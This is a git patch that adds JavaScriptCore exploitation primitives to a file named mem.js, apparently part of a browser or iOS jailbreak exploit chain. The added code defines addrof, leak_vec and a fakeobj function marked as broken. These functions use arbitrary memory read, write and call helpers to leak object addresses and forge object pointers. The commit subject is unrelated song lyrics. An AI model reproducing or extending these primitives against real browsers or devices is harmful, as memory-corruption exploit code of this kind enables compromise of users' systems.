From b040db45dfc9ef9a902e48bc2718a94cd099f505 Mon Sep 17 00:00:00 2001
From: spv420 <unomilliono@gmail.com>
Date: Tue, 31 May 2022 19:51:14 -0400
Subject: I live in a constant state of fear and misery Do you miss me anymore?
 And I don't even notice When it hurts anymore Anymore Anymore Anymore

---
 src/js/primitives/mem.js | 39 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)

(limited to 'src/js/primitives/mem.js')

diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index f6c4fe7..0cd2b7d 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -228,4 +228,43 @@ function _sptr(s) {
  */
 function sptr(s) {
 	return _sptr(s + "\0");
+}
+
+var string_ref;
+var global_object;
+var jsobj_addr;
+
+var large_buf = new Uint32Array(0x100000);
+var large_buf_ptr = 0;
+
+function prep_shit() {
+	string_ref = scall("JSStringCreateWithUTF8CString", "victim");
+	global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+	jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+	large_buf_ptr = leak_vec(large_buf);
+}
+
+function addrof(obj) {
+	victim.target = obj;
+	return read_u32(jsobj_addr + 0x18);
+}
+
+// broken
+function fakeobj(addy) {
+	var string_ref = scall("JSStringCreateWithUTF8CString", sptr("victim"));
+	var global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+	var jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+	printf("YOLO\n");
+	printf("1 %x\n", read_u32(jsobj_addr + 0x18));
+	victim.target = 13.37;
+	printf("2 %x\n", read_u32(jsobj_addr + 0x18));
+	write_u32(jsobj_addr + 0x18, addy);
+	printf("3 %x\n", read_u32(jsobj_addr + 0x18));
+	return victim.target;
+}
+
+function leak_vec(arr) {
+	var addy = addrof(arr);
+	printf("%x\n", addy);
+	return read_u32(addy + VECTOR_OFFSET);
 }
\ No newline at end of file
-- 
cgit v1.2.3